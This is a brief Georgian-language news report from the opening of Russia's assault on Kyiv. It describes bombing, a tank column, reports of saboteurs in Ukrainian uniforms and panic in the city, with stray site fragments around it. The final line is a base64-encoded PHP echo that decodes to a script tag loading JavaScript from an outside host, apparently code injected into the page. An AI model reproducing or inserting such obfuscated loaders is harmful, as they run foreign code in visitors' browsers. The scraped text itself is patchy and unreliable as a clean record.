celsiusi
ავერსი საქკაბელი
კიევი რუსული ავიაციის მიერ იბომბება. ამასთან, ვრცელდება ინფორმაცია, რომ ოკუპანტების ტანკების კოლონა, რომელიც კიევისკენ მოდიოდა, გადაინაცვლებს ანტონოვის აეროპორტში და კიევისკენ შემდეგ წავა. აეროპორტი კიევიდან 30-35 კილომეტრითაა დაშორებული.
 
კიევის თავდაცვის სამინისტრო ავრცელებს ინფორმაციას, რომ კიევის სიახლოვეს, რამდენიმე წერტილში უკრაინული ჯარების განიარაღება მოხდა, რუსმა ოკუპანტებმა გადაიცვეს მათი ფორმები და ახლა უკრაინული ტექნიკით შემოდიან ქალაქში. მათივე ცნობით, მოსალოდნელია დივერსიული ჯგუფების შეტევა სხვადასხვა ობიექტებსა თუ მოქალაქეებზე. 
კიევის მოსახლეობა პანიკაშია.
 
ავტომობილები ქუჩებში სწრაფად გადაადგილდებიან. პერიოდულად, ჩანს სამხედრო ტექნიკაც, რომელიც ქალაქის შესასვლელისკენ მიემართება, სავარაუდოდ, სწორედ იმ მხრიდან ელოდებიან შეტევას.
 
შეტაკებები მიმდინარეობს ქვეყნის თითქმის ყველა ნაწილში, ყველა დიდ ქალაქსა თუ სოფელში. ჯერჯერობით, არ არის ინფორმაცია მსხვერპლისა და განადგურებული ტექნიკის შესახებ. 
 
 
919
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");